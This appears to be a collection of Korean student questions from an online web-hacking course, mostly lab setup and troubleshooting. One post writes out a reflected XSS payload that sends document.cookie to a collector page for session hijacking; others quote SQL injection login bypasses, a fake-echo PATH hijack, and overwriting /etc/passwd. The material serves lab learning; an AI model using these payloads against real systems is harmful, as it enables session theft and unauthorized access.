Session 10 . 대응방안에서 실습[9-1] Prepared Statement 취약한 소스코드와 안전한 소스코드 강의 10분 49초 부분에서 궁금 사항이 있습니다. 만약 num 파라미터 값을 Integer num = Integer.parseInt(request.getParameter("num"))Integer 형 변환하여 처리하였으나, String sql = "SELECT * FROM ex_member WHERE num = " + num; SQL 구문 자체는 Prepared Statement를 적용하지 않았을 때 이 부분도 취약한걸까요? 결국 인젝션 공격을 위해 문자열은 들어갈 수 밖에 없을 것 같은데 형 변환에서 모두 에러 발생되므로 공격이 불가할 것 같은데 맞을까요?

영상처럼 정상적으로 했는데오라클만 이렇게 나오고 있어요DBeaver에서 오라클은 localhost로 하면 오류가 떠서 현재 제 컴퓨터 ip로 만들었습니다

현재 강의 업데이트가 잘 안이뤄지고 있는것 같은데요..이전 강의(삭제예정) 이건 너무 예전 거라 지금 환경에서는 따라서 환경 구축하는것도 어렵네요 에러만 나고 강의 들이 너무 혼잡하게 되어있는 느낌 이예요 강의 업데이트는 언제 이뤄지는건가요?

Reflected XSS를 이용한 세션 하이재킹 강의에서 search 검색란에 <> 태그에 대한 html 엔티티 보안 조치가 적용되어 "으로만 사용하는 이벤트 핸들러를 사용Payload : " autofocus onfocus="new Image().src='http://localhost/board/session.php?data=' + document.cookie"http://localhost/board/index.php?search_type=all&keyword=%22+autofocus+onfocus%3D%22new+Image%28%29.src%3D%27http%3A%2F%2Flocalhost%2Fboard%2Fsession.php%3Fdata%3D%27+%2B+document.cookie%22&page=board페이로드는 위와 같이 작성하였으며, 해당 페이로드를 요청하는 URL은 위와 같습니다.여기서 궁금한 점은 희생자들이 URL을 요청하기 위해 게시판에 a 태그를 사용하여 링크로 접속하는 방법을 사용하셨는데 여기서 꺽새, 더블쿼터에 대한 필터링을 사용하고 있다면 아예 사용할 수 없는지 궁금합니다

 원래 APMsetup으로 취약한 홈페이지 올려서 실습하다가 XAMPP로 재설치하였습니다.그런데 기본적인 설정을 다 하고 나니 list.php에서 못 보던 에러가 뜨는데 혹시 무엇이 문제인지 알수 있을까요? 

섹션 8 실습 도중에 파일을 업로드 하는데 "파일 업로드를 실패 하셨습니다."라고 나옵니다. 파일 업로드에 대한 코드를 수정한것도 없는데 파일이 업로드 되지 않아서 예전에 있던 질문을 확인하였는데 제 코드는 수정되어 있어서 문제점을 찾을수가 없어서 문의남깁니다.if(!(@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadPath))) { echo("<script>alert('파일 업로드를 실패 하셨습니다.');history.back(-1);</script>"); exit; }

실습을 잘하고 있었는데 갑자기 로그인 페이지에서 로그인하면 에러가 발생하여 다시 insecure_website를 다운하여 실습을 진행하려 하는데 insecure_website폴더를 htdocs폴더 안에 넣었고 common.php에서 패스워드도 설정하고 query.txt의 내용을 복사하여 MYSQL에 작성도 했는데 접근이 거부되었다고 나옵니다. 전에는 잘 되었는데 다시 다운받아서 하니 되지 않는데 어떻게 해야 하나요?

members 랑 tb_board 는 언제 만든거에요? ㅋㅋㅋㅋ

자동화 도구 제작 관련해서 지식이 전무하기에 너무 공부하고싶습니다.언제쯤 나올 수 있는지 대략적으로라도 알려주실 수 있으신가요 ?

Fatal error: Call to undefined function curl_init() in C:\APM_Setup\htdocs\wgw_website\oauth\friends_api.php on line 3해당 에러가 발생합니다www.wgw.co.kr 에서 oauth 로그인시 해당 oauth.friends.co.kr 도메인으로 넘어가고 해당 페이지에서 id, pw 입력시 위 에러가 발생합니다.코드값은 db에 잘 기록되는거 같은데, 뭐가 문제일까요?

안녕하세요.올려주신 강의를 모두 수강하였습니다. 강의 내용이 저에게 많이 도움이 되어 해당 내용을 개인 블로그에 업로드하고 싶은데 괜찮을지 문의드립니다.답변주시면 감사합니다.

안녕하세요.올려주신 강의를 모두 수강하였습니다. 강의 내용이 저에게 많이 도움이 되어 해당 내용을 개인 블로그에 업로드하고 싶은데 괜찮을지 문의드립니다.추가적으로 파일 업로드 고급 공격 기법을 정리한 PART 2는 언제 업로드 되는지 확인 부탁드립니다. 답변주시면 감사합니다.

(py3) C:\Users\bbsec>pip install frida==12.6.11Collecting frida==12.6.11 Using cached frida-12.6.11.tar.gz (6.6 kB) Preparing metadata (setup.py) ... doneBuilding wheels for collected packages: frida Building wheel for frida (setup.py) ... error error: subprocess-exited-with-error × python setup.py bdist_wheel did not run successfully. │ exit code: 1 ╰─> [74 lines of output] running bdist_wheel running build running build_py creating build\lib.win-amd64-cpython-312\frida copying frida\core.py -> build\lib.win-amd64-cpython-312\frida copying frida\__init__.py -> build\lib.win-amd64-cpython-312\frida running build_ext querying pypi for available prebuilds network query failed looking for prebuilt extension in home directory, i.e. C:\Users\bbsec/frida-12.6.11-py3.12-win-amd64.egg no prebuilt extension found in home directory Traceback (most recent call last): File "<string>", line 2, in <module> File "<pip-setuptools-caller>", line 34, in <module> File "C:\Users\bbsec\AppData\Local\Temp\pip-install-a7nfbzkm\frida_1f1fcba5021e4d38ba236f76104d2b97\setup.py", line 144, in <module> setup( File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\__init__.py", line 117, in setup return distutils.core.setup(**attrs) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\core.py", line 183, in setup return run_commands(dist) ^^^^^^^^^^^^^^^^^^ File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\core.py", line 199, in run_commands dist.run_commands() File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\dist.py", line 954, in run_commands self.run_command(cmd) File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\dist.py", line 950, in run_command super().run_command(command) File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\dist.py", line 973, in run_command cmd_obj.run() File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\command\bdist_wheel.py", line 398, in run self.run_command("build") File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\cmd.py", line 316, in run_command self.distribution.run_command(command) File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\dist.py", line 950, in run_command super().run_command(command) File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\dist.py", line 973, in run_command cmd_obj.run() File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\command\build.py", line 135, in run self.run_command(cmd_name) File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\cmd.py", line 316, in run_command self.distribution.run_command(command) File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\dist.py", line 950, in run_command super().run_command(command) File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\dist.py", line 973, in run_command cmd_obj.run() File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\command\build_ext.py", line 98, in run buildext.run(self) File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\command\build_ext.py", line 359, in run self.build_extensions() File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\command\build_ext.py", line 476, in build_extensions self._build_extensions_serial() File "C:\Users\bbsec\anaconda3\envs\py3\Lib\site-packages\setuptools\_distutils\command\build_ext.py", line 502, in buildextensions_serial self.build_extension(ext) File "C:\Users\bbsec\AppData\Local\Temp\pip-install-a7nfbzkm\frida_1f1fcba5021e4d38ba236f76104d2b97\setup.py", line 130, in build_extension raise network_error File "C:\Users\bbsec\AppData\Local\Temp\pip-install-a7nfbzkm\frida_1f1fcba5021e4d38ba236f76104d2b97\setup.py", line 89, in build_extension urls = client.release_urls("frida", frida_version) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\bbsec\anaconda3\envs\py3\Lib\xmlrpc\client.py", line 1122, in call return self.__send(self.__name, args) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\bbsec\anaconda3\envs\py3\Lib\xmlrpc\client.py", line 1461, in __request response = self.__transport.request( ^^^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\bbsec\AppData\Local\Temp\pip-install-a7nfbzkm\frida_1f1fcba5021e4d38ba236f76104d2b97\setup.py", line 56, in request return self.parse_response(fp) ^^^^^^^^^^^^^^^^^^^^^^^ File "C:\Users\bbsec\anaconda3\envs\py3\Lib\xmlrpc\client.py", line 1351, in parse_response return u.close() ^^^^^^^^^ File "C:\Users\bbsec\anaconda3\envs\py3\Lib\xmlrpc\client.py", line 668, in close raise Fault(**self._stack[0]) xmlrpc.client.Fault: <Fault -32500: 'RuntimeError: PyPI no longer supports the XMLRPC package_releases method. Use JSON or Simple API instead. See https://warehouse.pypa.io/api-reference/xml-rpc.html#deprecated-methods for more information.'> [end of output] note: This error originates from a subprocess, and is likely not a problem with pip. ERROR: Failed building wheel for frida Running setup.py clean for fridaFailed to build fridaERROR: ERROR: Failed to build installable wheels for some pyproject.toml based projects (frida)오류내용입니다.최신버전 프리다랑 강의에서 사용하는 프리다의 버전차이로 인해 오류가 발생하여 강의에 맞는 프리다 버전을 설치하려고 하는데 오류가 발생합니다.

포트를 바꾸어가며 실행해보았는데, 실행이 되지 않고ERROR org.owasp.webgoat.StartWebGoat - Port 127.0.0.1:8080 is already in use라는 오류가 계속 뜹니다.netstat -ano | findstr를 사용하여 검색을 해봤는데, 결과는 아무것도 뜨지 않아 질문 드립니다.  

echo파일을 만든 후에 chmod o+x echo명령어를 쳐서 order에 실행 권한을 주었습니다./home/flag01/flag01을 쳐서 실행해보니 permissin denied라고 권한이 없다고 뜹니다.chmod 777 echo를 사용해서 권한을 다 주니 정상적으로 flag01권한을 얻을 수 있었는데, 왜 chmod o+x echo는 권한이 없다고 뜨는지 궁금합니다.1.chmod 777 echo 2.chmod o+x echo  

msfconsole에서 세팅 잘되어 있는것 같은데 왜 자꾸 제목처럼 저런 오류가 뜰까요??아무리 검색해봐도 모르겠어요. 세

자꾸 로그인이 안됩니다Could not drop existing databaseSQL: Error dropping database (can't rmdir './dvwa', errno: 39 "Directory not empty")라고 만 떠요 해결책 있을까요?..

cp passwd /etc/passwd 입력하면 cp: cannot create regular file '/etc/passwd': Permission denied 이렇게 떠요 해결방법을 모르겠어요..ㅜㅠ

코드는 이렇습니다중간에 echo는 제가 찍어본 것이고admin'-- 이렇게 입력하면query : 'select * from member where id='admin'--' and pw='b59c67bf196a4758191e42f76670ceba''쿼리는 이렇게 찍히는데 Fatal error: Call to a member function fetch_assoc() on a non-object in <b>C:\APM_Setup\htdocs\login\loginAction.php 결과값이 없다고 오류가 나버립니다.mysql에서 직접 admin'-- 이렇게 넣어봐도 잘 나오는데... 뭐가 문제일까요? +강의 뒷부분의 'or1=1-- 도 넣으면 에러납니다. 

basic 을 넣고하면 flag가 HackWorld{censor}로 나와서 답이 아니길래 ./basic 을 빼고 했는데이렇게 경로가 / 여기로 가지는데 여기서 플래그를 찾아야 하는건가요? ..